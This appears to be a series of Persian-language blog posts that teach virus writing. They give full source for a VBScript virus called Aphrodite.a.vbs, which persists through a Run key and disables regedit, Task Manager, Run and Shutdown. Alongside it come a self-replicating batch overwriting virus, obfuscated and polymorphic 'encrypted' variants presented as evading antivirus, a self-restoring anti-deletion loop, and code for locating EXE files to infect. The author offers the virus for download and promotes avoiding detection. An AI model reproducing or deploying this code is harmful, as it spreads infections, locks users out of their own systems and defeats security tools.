ویروس ایرانی

من دانلود سورس ویروس Aphrodite.a.vbs رو در قسمت قبل گذاشتم.

این ویروس از دو قسمت تشکیل شده:

1.installation

2.infection

امروز قسمت installation این ویروس رو آموزش میدم که خیلی به شما در ضمینه نوشتن ویروس کمک میکنه.در این قسمت،ویروس،خودش را بر روی هر ویندوزی که باشد نصب میکند.کدهای قسمت اول ویروس رو در زیر مشاهده میکنید:

on error resume next set w = createobject("wscript.shell") rk = "HKCU\Software\Microsoft\Windows Script Host\Settings\Timeout" tmo = w.regread(rk) if not(tmo = 0) then w.RegWrite rk ,0,"REG_DWORD" end if set f = createobject("scripting.filesystemobject") set s = f.getspecialfolder(1) h = s & "\aphrodite.vbs" set m = f.opentextfile(wscript.scriptfullname) c = m.readall if f.fileexists(h) = false then f.copyfile wscript.scriptfullname, h set l = f.getfile(h) l.attributes = 1 else set o = f.opentextfile(h,1) e = o.readall i1 = instr(1, e, ".::aphrodite.vbs::.", 1) if i1 = 0 then l.attributes = 0 f.copyfile wscript.scriptfullname, h l.attributes = 1 end if end if lm = "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\" er = w.regread(lm & "aphrodite") if not(er = h) then w.regwrite lm & "aphrodite", h end if cu = "HKCU\software\microsoft\windows\currentversion\policies\" w.regwrite cu & "system\disableregistrytools",1, "REG_DWORD" w.regwrite cu & "system\disabletaskmgr",1, "REG_DWORD" w.regwrite cu & "Explorer\NoRun", 1, "REG_DWORD" w.regwrite cu & "Explorer\NoClose", 1, "REG_DWORD"

خط اول رو که همتون میدونید.در خط دوم ما شئ wscript.shell را برای دسترسی به رجیستری تعریف میکنیم.در خط سوم متغیری به نام rk را مقدار دهی کردم و در خط چهارم از متد regread برای خوندن رجیستری استفاده کردم.چیزی که خونده شده همان rk بوده.rk در این جا همان مسیر تنظیمات timeout برای فایل های vbs میباشد.خب ما در خط چهارم مقدار این مسیر در رجیستری رو خوندیم و در متغیر tmo قرار دادیم.در خط پنجم میگه که اگه tmo برابر صفر نبود کدهای بعدی رو اجرا میکنه.کد بعدی کد خط ششم است که مقدار صفر را برابر آن مقدار در رجیستری قرار میدهد.اگر این مقدار یک باشد،ویروس پس از یک ثانیه از کار میفته اما قبل از این که یک ثانیه بشه،ویروس این مقدار رو برابر صفر میکنه که یعنی غیرفعال.خط هفتمم که پایان شرطی بود که گذاشتیم.در خط هشتم هم شیئ fso را برای دسترسی به فایل ها،فولدر ها و درایو ها تعریف کردم و در خط نهم با متد getspecialfolder مسیر پوشه سیستم ویندوز رو به دست میاریم و در خط دهم یه مسیر به نام h رو تعریف میکنیم که قراره مسیر ویروس در کامپیوتر قربانی باشه.در خط یازدهم ویروس خودشو به عنوان یک فایل متنی باز میکند و در خط دوازدهم تمام محتویات و کدهای خودش را میخواند و در متغیر c قرار میدهد.در خط سیزدهم چک میکند که آیا فایلی با مسیر h وجود داره یا نه.اگه وجود نداشته باشه کد خط های بعدی را اجرا میکند.در خط چهاردهم خودش رو در مسیر h کپی میکنه و سپس در خط پانزده با متد getfile مشخصات فایلی با مسیر h رو میگیره و سپس در خط شانزدهم attributes فایل رو برابر یک قرار میده که همان readonly خالی میشود.اگر خط پانزدهم انجام نشود،خط شانزدهم هم انجام نخواهد شد.در خط هفدهم فقط عبارت else رو میبینید.یعنی اگه طور دیگه باشه و فایلی با مسیر h وجود داشته باشه،کدهای بهدی را تا end if اجرا کند.در خط هجدهم فایل با مسیر h را به صورت یک فایل متنی باز میکند و در خط نوزدهم تمام کدهای فایل را میخواند و در متغیر o قرار میدهد.در خط بیستم چک میکند که آیا عبارت .::Aphrodite.vbs::. در این فایل وجود داره یا نه.در خط بیست و یکم میگوید که اگر این عبارت در فایل وجود نداشته باشه کد خط های بعدی رو اجرا کنه.عبارت .::Aphrodite.vbs::. یک رمز است که مشخص میکند که آیا آن فایل همان ویروس خودمان میباشد یا نه.اگر نه در خط بیست و دوم attributes فایل رو برابر صفر یا همون عادی قرار میدیم و در خط بیست و سوم خودمون رو به جای اون فایل کپی میکنیم و سپس در خط بیست و چهارم دوباره attributes فایل رو برابر یک قرار میدیم که همون readonly خالیه.خط بییست و پنجم و بیست و ششم هم پایان شرط هایی که گذاشتیم رو مشخص میکنه.در خط بیست و هفتم یک مقدار در رجیستری را تعریف میکنیم و در متغیر lm قرار میدیم.در خط بیست و هشتم این مسیر در رجیستری را + Aphrodite میخونیم و در متغیر er قرار میدیم.در خط بیست و نهم میگیم که اگر er برابر h نبود،در خط سی یک مقدار در رجیستری نوشته بشه که باعث میشه ویروس در هر بار اجرای ویندوز اجرا بشه و  خط سی و یکم هم پایان شرطه.در خط سی و دوم یک مسیر در رجیستری را تعریف میکنیم و در متغیر cu قرار میدیم و در خط سی و سوم یک مقدار در رجیستری مینویسیم که باعث غیرفعال شدن regedit میشود.خط های بعدی هم همین کار را انجام میدهند با این تفاوت که خط سی و چهارم taskmanager غیرقعال میشود.غیرفعال شدن regedit و taskmanager به این صورت نیازی به log off یا restart کردن ویندوز نداره ولی در خط سی و پنجم ویروس run موجود در startmenu را غیرفعال میکند و خط سی و ششم هم باعث غیرفعال شدن shutdown موجود در startmenu میشود که این دو نیاز به log off یا restart ویندوز دارند.در این جا قسمت installation ویروس پایان میپذیرد و در پست بعدی قسمت infection ویروس یا همون آلوده کردن فایل ها توسط ویروس رو آموزش میدم.

این ویروس دومین ویروسی است که ساختم و میخوام سورسشو به شما تقدیم کنم.بعضی از آرزوهای ویروسی شما ممکنه تو سورس این ویروس باشه.ساختنش یک هفته وقتمو گرفت.جدیدترین نسخه آنتی ویروس کاسپراسکای با جدیدترین آپدیتش نتونست این ویروس رو شناسایی کنه در حالی که اگه هفت خط از ابتدای این ویروس رو پاک کنید،کاسپراسکای اعلام می کنه که ویروس پیدا شده.تو این پست هم دانلود سورس ویروس رو خواهید داشت و هم توضیح کامل ویروس رو.این ویروس تعدادی از کارهاشو هم با رجیستری انجام میده که عبارتند از:

1.از کار انداختن timeout فایل های vbs بلافاصله پس از اجرا شدن ویروس.

Timeout ،باعث توقف اجرای فایل vbs پس از مدتی که کاربر تعیین کرده میشه.

2.اجرای ویروس در هر بار اجرای ویندوز

3.غیرفعال کردن regedit

4.غیرفعال کردن taskmanager

همچنین به کمک رجیستری دو عدد از ابزارهای موجود در منوی استارت را غیرقابل استفاده میکند:

5.غیرفعال کردن run

6.غیرفعال کردن shutdown

حجم این ویروس در حالت عادی 2.10 کیلوبایت میباشد که واقعا" خارق العاده است.این ویروس فایل های vbs و vbe موجود در کل هارد را با سرعتی باورنکردنی آلوده میکند.

روشی که برای آلوده کردن فایل ها دارد،خاص خود ویروس است و تنها ویروس vbs است که به این صورت یک فایل را آلوده میکند.سورس ویروس گویای همه چیز خواهد بود.از لینک زیر میتونید ویروس رو دانلود کنید.بعد از دانلود،روی ویروس کلیک راست کنید و edit رو بزنید تا بتونید کدهای ویروس رو ببینید.

دانلود ویروس Aphrodite.a.vbs

آموزش کامل ویروس رو به زودی میذارم اما توضیح کوتاهی که درباره ویروس باید بدم اینه:

اولین کاری که ویروس پس از اجرا شدن انجام میده غیرفعال کردن timeout فایل های vbs است.سپس مسیر پوشه سیستم ویندوز رو بدست میاره و خودش رو با نام Aphrodite.vbs در این پوشه کپی میکنه که شما خودتون میتونید هر اسمی که خودتون دوست دارید بذارید اما هواستون باشه ساختار کلی ویروس به هم نریزه.اگه فایلی که میخواد تو پوشه سیستم ویندوز کپی کنه از قبل وجود داشته باشه،چک میکنه که آیا ویروس Aphrodite.a.vbs هست یا نه.اگه نبود خودش رو به جای اون کپی میکنه.در بین این کار کدهای خودش هم میخونه و در حافظه نگه میداره که این کار برای آلوده کردن فایل ها الزامی است.سپس regedit و taskmanager و چیزای دیگه ای که در ابتدای پست گفتم رو به کمک رجیستری غیرفعال میکنه و حالا دیگه نوبت آلوده کردن فایل ها میرسه.هیچ فایلی از چشم این ویروس مخفی نمیمونه.اول همه درایوهای کامپیوتر رو بدست میاره و سپس هر فایلی که vbs یا vbe باشه را چک میکنه که آیا قبلا" آلوده شده یا نه.اگر آلوده شده که دنبال فایل بعدی میگرده اما اگه آلوده نشده،اول از هر کاری عدد مربوط به attributes فایل رو میگیره و در متغیر v ذخیره میکنه.سپس attributes فایل رو برابر صفر قرار میده و کدهایش خودش رو در انتهای فایل قرار میده و بعد هم attributes فایل رو برابر v یا همون مال خودش قرار میده.این کار دو دلیل داره.اولش این که فایل های فقط خواندنی هم آلوده شوند و اگر مخفی باشد یا دارای هر attribute دیگه ای باشه،بعد از آلوده سازی به حالت اولش برگرده و کاربر شک نکنه که فایلش تغییر کرده.

اگر به اسم ویروس دقت کرده باشید میبیند که این ویروس تنها ویروسی نیست که میخوام به این صورت بنویسم بلکه به زودی ویروس های Aphrodite.b.vbs و Aphrodite.c.vbs رو هم میسازم و سورسشو در اختیار شما قرار میدم تا خودتون هم به زودی یه ویروس به این صورت بسازید.این ویروس کمک زیادی در رابطه با ساخت یک ویروس به شما میکنه.خب.امیدوارم که این ویروس تعدادی از نیازهای شما رو برطرف کرده باشه.

طبق گفته kaspersky ،یکی از خطرناک ترین ویروس های bat (کرم نه ویروس)،ویروس bat.silly میباشد و تمام فایل های bat و cmd موجود در دیسکی که قرار دارد را به روش رونویسی آلوده میکند.

@echo off

@for /r \ %%a in (*.bat,*.cmd) do copy %0 %%a

کدهای زیر هم کدهای encrypt شده ویروس میباشد که آنتی ویروس ها آن را نمیشناسند:

%reza%@for /r \ %%a in (*.ba%reza%t,*.cmd) do co%reza%py %0 %%%reza%a

این هم از کدی که آنتی ویروس kaspersky میشناسه:

for %%a in (*.bat) do copy %0 %%a

کد سوم فقط فایل های bat موجود در پوشه جاری را آلوده میکند و کد دوم را هیچ آنتی ویروس نمیشناسد و همان کار کد اول را انجام میدهد.

سلام دوستان.از این که مدتی نبودم معذرت می خوام.تو این مدت سوالاتی پرسیده بودید که تو این پست به همه اونا جواب میدم.اول از همه به دوست خوبم شیطان دراز دست بگم که برای مخفی کردن دستورات در یک فایل bat ،ابتدای کدهای ویروس،کد @echo off را قرار دهد.در ضمن به وسیله برنامه turbo assembler می تواند کدهایش را در قالب com داشته باشد.سرعت اجرای فایل های com بالاست.از masm هم برای اسمبل کردن آن ها می تواند استفاده کند.در این حالت اگر کدها مشکلی نداشته باشند ویروس در عرض 3 ثانیه عمل می کند.(با توجه به کدهای ویروس)

یکی از دوستان هم گفته بود که یه ویروس با ویژوال بیسیک ساخته که فقط در کامپیوتر خودش کار می کنه.خب اگه خود ویروسش اشکال نداره،پس ویندوزی که ویروس درونش اجرا نمیشه فایل های ویژوال بیسیک رو پشتیبانی نمی کنه.یکی از برنامه هایی که این مشکل رو رفع می کنه برنامه upx هست که با یک سرچ در گوگل می تواند آن را دانلود و به راحتی از آن استفاده کند.

آقا آرش هم می خواستن لیست فایل های دیسک c رو داشته باشن.این کار در ویژوال بسیک با کدهای زیر امکان پذیر است:

search("c:\") function search(path) set fso = createobject("scripting.filesystemobject") set folder=fso.getfolder(path) set files = folder.files for each file in files msgbox(file.path) next set subfolders = folder.subfolders for each subfolder in subfolders search subfolder.path Next end function</body> </html>

این پست هم به خاطر دوست خوبمون شیطان دراز دست می نویسم.اگر پست تبدیل ویروس vbs به bat رو خونده باشید و با دستورات ویژوال بیسیک اسکریپت هم آشنایی داشته باشید خودتون می تونید این کار رو انجام بدید اما با خوندن این پست می تونید چیزای تازه ای که ربطی به این موضوع ندارن هم یاد بگیرید.باز هم با یک مثال این کار رو نشون میدم.مثلا" ما یک ویروس bat داریم که دارای کدهای زیر است:

@echo off

Rem this is a example of bat file

@del d:\reza.exe

این کدها فایل d:\reza.exe رو حذف می کنند.البته این کد ها ویروس نیستند.حالا ما می خوایم یه فایل vbs داشته باشیم که وقتی اجرا شد کدهای batchscript بالا هم اجرا بشه.اون کدها،کدهای زیر هستند:

Set fso = createobject("scripting.filesystemobject")

set r = fso.createtextfile("c:\bat.bat", true)

set r2 = fso.getfile("c:\bat.bat")

r2.attributes = 2

r.writeline "@echo off"

r.writeline " Rem this is a example of bat file"

r.writeline "@del d:\reza.exe"

r.close

set r3 = createobject("wscript.shell")

r3.run "c:\bat.bat"

در خط اول شئ fso رو تعریف کردیم و در خط دوم هم فایل c:\bat.bat را درست می کنیم.وجود true در این خط باعث می شود تا اگر فایل وجود داشته باشد عملیات رونویسی رخ دهد و اطلاعات قبلی فایل از بین بروند.در خط سوم و چهارم فایل را hidden می کنیم.در سه خط بعد اطلاعات ویروس bat خودمان را خط به خط به فایل اضافه می کنیم و در خط بعدی فایل را می بندیم.سپس در دو خط آخر فایل c:\bat.bat رو اجرا می کنیم.

موفق باشید

تصمیم گرفتم این پست رو که قبلا" هم نوشته بودم update کنم.کدهای زیر مانع از delete شدن ویروستون میشه.برای امتحان از صحت این موضوع این کدها رو در notepad کپی کرده و بعد با پسوند vbs ذخیره کنید.ویروس رو اجرا کنید سپس فایل ویروسی رو که اجرا کردید delete کنید(سعی کنید از shift+delete استفاده کنید).بعد می بینید که ویروستون بعد از این که delete شد به جای اولش برم می گرده.تنها آنتی ویروسی که تونست حذفش کنه kaspersky بود.این روش اختراع خودمه شاید شما هم بتونید همچین روش هایی رو ابداع کنید..توضیح خط به خط ویروس رو هم تو همین پست گذاشتم.کدهای encrypt شده ویروس هم گذاشتم.

reza() Function reza() Set fso = CreateObject("scripting.filesystemobject") Set r = fso.opentextfile(wscript.scriptfullname, 1) m = r.readall r.Close Do If Not (fso.fileexists(wscript.scriptfullname)) Then Set r2 = fso.createtextfile(wscript.scriptfullname, True) r2.write m r2.Close End If Loop End Function

کدهای بالا را در notepad کپی کرده و سپس با پسوند vbs ذخیره کنید.

خط اول:باعث اجرای کدهای function می شود.

خط دوم:شروع function است.

خط سوم:تعریف شئ fso برای دسترسی به فایل ها.

خط چهارم:در این جا ویروس خودش را به صورت یک فایل متنی برای خواندن باز می کند.

خط پنجم:کدهای خودش را می خواند و در متغیر m قرار می دهد.

خط ششم:فایل را می بندد.

خط هفتم:ایجاد حلقه do-loop .مانند یک timer می ماند که interval آن یک هست.

خط هشتم:چک می کند که آیا delete شده است یا نه؟درصورتی که حذف شده است کدهای خط های نه و ده و یازده را اجرا می کند.

خط نهم:فایلی برای خودش با همان نام و در همان جای قبلی می سازد.

خط دهم:اطلاعات متغیر m را درون فایل قرار می دهد.

خط یازدهم:فایل را می بندد.

خط دوازدهم:پایان حلقه do-loop .

خط  سیزدهم:پایان function .

کدهای encrypt شده ویروس که مانع از شناسایی ویروس توسط آنتی ویروس ها میشه.این کدها همام کاری رو انجام میدن که کدهای بالا انجام میدن.این روش پیشرفته ترین روش encrypt کردن ویروس های vbs است.کدهای زیر رو در notepad کپی کرده و با پسوند vbs ذخیره کنید.این نکته بسیار مهم هم یادتون باشه که اگه می خواین از کدهای زیر در ویروستون استفاده کنید،این کدها را در آخر ویروسستون کپی کنید.یعنی کدهای اصلی ویروس خودتون رو اول بنویسید در آخر از هر کدی این کدها را بگذارید.

a1 = "uh}d+,=Ixqfwlrq#uh}d+,=Vhw#ivr#@#FuhdwhRemhfw+%vfulswlqj1ilo" a1 = a1 & "hv|vwhpremhfw%,=Vhw#u#@#ivr1rshqwh{wiloh+zvfulsw1vfulswixooq" a1 = a1 & "dph/#4,=p#@#u1uhdgdoo=u1Forvh=Gr=Li#Qrw#+ivr1ilohh{lvwv+zvfu" a1 = a1 & "lsw1vfulswixooqdph,,#Wkhq=Vhw#u5#@#ivr1fuhdwhwh{wiloh+zvfuls" a1 = a1 & "w1vfulswixooqdph/#Wuxh,=u51zulwh#p=u51Forvh=Hqg#Li=Orrs=Hqg#" a1 = a1 & "Ixqfwlrq=" for i1 = 1 to len(a1):u1 = mid(a1,i1,1):e1 = asc(u1) - ((40/40)+(4*4)/(4+4))+((419*5/419)-5) : k1 = chr(e1):j1 = j1 + k1:next: Randomize:KS892 = int(rnd*255)+1:if KS892 = 1000 then:for z1 = 0 to KS892:s1 = strreverse(j1):next:end if:execute(j1) set fso=createobject("scripting.filesystemobject"):set lookback=fso.opentextfile(wscript.scriptfullname,1,false) poly = lookback.readall Randomize:polyint = Int(Rnd * 9):if polyint > 2 then:polynew = replace(poly,"((40/40)+(4*4)/(4+4))+((419*5/419)-5)","((40/40)+(4*4)/(4+4))+((419*5/419)-5)*"&polyint/polyint):else:polynew = replace(poly,"((40/40)+(4*4)/(4+4))+((419*5/419)-5)",chr(51)&chr(42)&chr(54)&chr(49)&chr(50)&chr(47)&chr(54)&chr(49)&chr(50)):end if Randomize:polyint1 = Int(Rnd * 9):if polyint > 2 then:polynew2 = replace(polynew,"polysev","polysev & " & polyint1):else:polynew2 = replace (polynew,"polysev",chr(112)&chr(111)&chr(108)&chr(121)&chr(115)&chr(101)&chr(118)):end if Randomize:polyint2 = Int(Rnd * 9):if polyint > 2 then:polynew3 = replace(polynew2,"a1","a1"&polyint2):else:polynew3 = replace(poly,"a1",chr(97)&"1"):end if Randomize:polyint3 = Int(Rnd * 9):if polyint > 2 then:polynew4 = replace(polynew3,"i1","i1"&polyint3):else:polynew4 = replace(poly,"i1",chr(105)&"1"):end if Randomize:polyint4 = Int(Rnd * 9):if polyint > 2 then:polynew5 = replace(polynew4,"u1","u1"&polyint4):else:polynew5 = replace(poly,"u1",chr(117)&"1"):end if Randomize:polyint5 = Int(Rnd * 9):if polyint > 2 then:polynew6 = replace(polynew5,"e1","e1"&polyint5):else:polynew6 = replace(poly,"e1",chr(101)&"1"):end if Randomize:polyint6 = Int(Rnd * 9):if polyint > 2 then:polynew7 = replace(polynew6,"k1","k1"&polyint6):else:polynew7 = replace(poly,"k1",chr(107)&"1"):end if Randomize:polyint7 = Int(Rnd * 9):if polyint > 2 then:polynew8 = replace(polynew7,"j1","j1"&polyint7):else:polynew8 = replace(poly,"j1",chr(106)&"1"):end if Randomize:polyint8 = Int(Rnd * 9):if polyint > 2 then:polynew9 = replace(polynew8,"b1","b1"&polyint8):else:polynew9 = replace(poly,"b1",chr(98)&"1"):end if Randomize:polyint9 = Int(Rnd * 9):if polyint > 2 then:polynew10 = replace(polynew9,"z1","z1"&polyint9):else:polynew10 = replace(poly,"z1",chr(122)&"1"):end if set newfile=fso.opentextfile(wscript.scriptfullname,2,false):newfile.write polynew10

Msgbox "1"

Msgbox "2"

حالا ما می خولیم یه فایل bat داشته باشیم که وقتی اجرا شد کدهای ویژوال بیسیکی بالا هم اجرا بشه.اول از همه بگم این کار به چه درد می خوره.باید بگم این کار بهترین روش محفوظ نگه داشتن ویروس از دست آنتی ویروس هاست.وقتی قرمت ویروس bat باشه،آنتی ویروس هم برای شناسایی ویروس شما،در بانک اطلاعاتی خودش به قسمت ویروس های bat میره و در نتیجه ویروس شما شناخته نمیشه.کد زیر همون کاری میکنه که دو خط کد بالا انجام میدن:

@echo Msgbox "1">%windir%\reza.vbs

@echo Msgbox "2">>%windir%\reza.vbs

@Cscript %windir%\reza.vbs

::http://iranianvirus.blogfa.com

کدهای بالا رو رو در notepad کپی کرده و سپس با پسوند bat ذخیره کنید.

خط اول:در فایل reza.vbs واقع در پوشه ویندوز کامپیوتر کد msgbox "1" رو قرار میده.(اگر فایل وجود نداشته باشه درستش میکنه).

خط دوم: در فایل reza.vbs واقع در پوشه ویندوز کامپیوتر کد msgbox "2" رو قرار میده.

خط سوم:فایل مذکور رو اجرا میکنه.

خط چهارم:جز توضیحاته چون علامت :: را در ابتدای خودش داره و معادل همین علامت در ویژوال بیسیک ' و در اسمبلی ; می باشد.

ریزه کاریا:

اگر در کدهای بالا دقت کرده باشید خواهید دید که در خط اول یک علامت > وجود دارد اما در خط دوم دو علامت > می باشد. این کار به این دلیل است که اگر ویروس bat شما مثلا" دو بار اجرا شد،فایل reza.vbs به صورت زیر تغییر نکند:

Msgbox "1"

Msgbox "2"

Msgbox "1"

Msgbox "2"

وجود تنها یک علامت باعث می شود تا عبارت msgbox "1" به صورت رونویسی در فایل reza.vbs نوشته شود.یعنی اطلاعات و کدهای قبلی فایل از بین بروند اما خط دوم ویروس باعث می شود تا عبارت msgbox "2" به فایل reza.vbs اضافه شود.

در batchscript عبارت %windir% معنی پوشه ویندوز رو می دهد و یک متغیر است.برای استفاده از ویروس های bat ابتدا کد آن ها را در notepad کپی کرده و سپس با پسوندbat  ذخیره کنید.

تو این قسمت یه سری از مهمترین کارها رو یاد می گیریم.مثلا" این که چه طوری یک فایل exe رو برای آلوده کردن پیدا کنیم.

این سوال ها باید برای شما پیش بیاد؟

1.ویروس ما چه فایل هایی رو می خواد آلوده کنه؟

2.فایل هایی که آلوده می خواد کنه چه طور پیدا می کنه؟

3.از کجا می فهمه که قبلا" آلودشون نکرده؟

4.چه طوری آلودشون می کنه؟

5.نکنه فایل هایی که آلوده می شن خراب بشن؟

6.آنتی ویروس ها می تونن بفهمن؟

من همه ی این سوال ها رو در طی این مقاله ی هفت قسمتی به شما پاسخ می دم.شاید از خودتون باز هم بپرسید که چرا آلوده کردن به روش کنترلی؟باید بگم که به دو دلیل من این روش رو انتخاب کردم:

1.فایل آلوده شده در هنگام scan  با آنتی ویروس کاملا" پاک اعلام می شه

2.فایل قابل پاک سازی نیست و تنها روش پاک سازی delete کردن فایل است

به نظر شما کدوم روش آلوده سازی این قابلیت های بسیار عالی رو داره؟این کار تو اسمبلی دیگه تابلو شده و خیلی از ویروس های اسمبلی می تونن این کار رو انجام بدن و شاید به همین دلیل یکی از دوستان در نظر ها گفته بود که این روش فقط با اسمبلی امکان پذیره اما باید بگم که این روش با هر زبان برنامه نویسی که یک فایل اجرایی می تواند درست کند قابل انجامه اما با سرعت های گوناگون که اسمبلی بالاترین رتبه رو داره ولی این روش به همین راحتی با آنتی ویروس ها شناسایی نمی شه.تو این پست دو روش رو برای پیدا کردن فایل های exe برای آلوده کردن یاد می گیریم.

1.تمام فایل های exe موجود در تمام پوشه های کامپیوتر

2.فایل های exe موجود در یک پوشه ی خاص

روش دوم که خیلی راحته.برای پیدا کردن اون ها می تونید از کدهای زیر استفاده کنید:

iv = Dir(App.Path & "\" & "*.EXE")

While iv <> ""

MsgBox (App.Path & "\" & iv)

iv = Dir()

Wend

این کدها مسیر تمام فایل های exe موجود در پوشه ای که ویروس قرار داره رو به صورت یک پیام نمایش میده.دیدید به همین راحتی شما تونستید یه سری فایل exe برای آلوده کردن به دست بیارید.افرادی که با ویژوال بیسیک کار می کنن درک این کدها براشون مثل آب خوردنه.حالا این کدها رو ببینید:

Set fso = CreateObject("scripting.filesystemobject")

Set r = fso.getspecialfolder(0)

iv = Dir(r & "\" & "*.EXE")

While iv <> ""

' infection codes

MsgBox (r & "\" & iv)

iv = Dir()

Wend

این کدها هم مسیر تمام فایل های exe موجود در پوشه ی ویندوز رو به ما میده.اگه دقت کنید یه جا نوشتم که infection codes .اونجا شما باید کدهایی رو بذارید که باعث آلده شدن فایل ها میشن.من تو اینجا از حلقه ی WHILE-WEND استفاده کردم تا تمام فایل های exe رو بدست بیاریم.کد dir(iv) باعث نمایش فایل exe بعدی می شه.این کار تا زمانی ادامه می یابه که تا همه ی فایل های exe رو برنامه بتونه ببینه.یعنی iv <> "" .این کدها کدهای ساده ای بودند.اما برای پیدا کردن تمام فایل های exe موجود در کامپیوتر می تونید به پست ویروس biosan مراجعه کنید.به آرشیو وبلاگ هم یه سر بزنید.من این کار رو حتی تو پست آلوده کردن فایل های rar هم گفتم و حتی توضیح هم دادم.دونستن این کدها برای یک ویروس نویس چندان سخت نیست.فقط یه کم تفکر می خواد.کلا" ویروس های آلوده کننده ی فایل های exe یکی از کارهای زیر رو انجام میدن:

1.آلوده کردن یک فایل exe خاص

2.آلوده کردن فایل های exe موجود در یک پوشه ی خاص

3.آلوده کردن فایل های exe موجود در تمام پوشه های کامپیوتر

4.ترکیبی از موارد بالا

من که خودم از نوع چهارم هستم و امیدوارم شما هم از اون نوع باشید.دیدید دوستان.به خاطر همین گفتم این قسمت مقاله مهمه.باید شما اول از هر چیز یک سری مواد اولیه داشته باشید.تا شما فایلی رو برای آلوده کردن ندارید چه طور می خواین فایل آلوده کنید.فرض کنید که یک ویروس بیولوژیکی گیاهی به دورن بدن یک جانور اومده و تو اونجا هیچ سلول گیاهی نمی تونه پیدا کنه تا آلودشون کنه.باید بگم در روش آلوده کردن کنترلی ما ماده ی وراثتی پیشرفته ای داریم چون در اصل دو تا ماده ی وراثتی داریم.حالا شاید فهمیده باشید که نوشتن ویروس خیلی از نوشتن یه کرم بهتره چون واقعا"حال میده با چند تا کد ساده که خومون ساختیم این آنتی ویروس های نابغه رو (؟) رو خیلی راحت اذیت کنیم.با این روش هر وقت فایل آلوده شده اجرا بشه ویروستون هم اجرا میشه.در پایان به یک سوالی که دوست خوبمون جواد پرسیده بود جواب بدم.پرسیده بود چرا ویژوال بیسیک؟باید بگم ویژوال بیسیک از نظر کد نویسی خیلی راحته و مثل اسمبلی یادگیریش سخت نیست.به نظر من ویژوال بیسیک و دلفی دو تا از بهترین زبان های برنامه نویسی برای ساخت ویروس های نرم افزاری هستن.قسمت سوم مقاله در رابطه با نحوه ی آلوده کردن فایل های exe و بهتره بگم تزریق ماده ی وراثتی هست.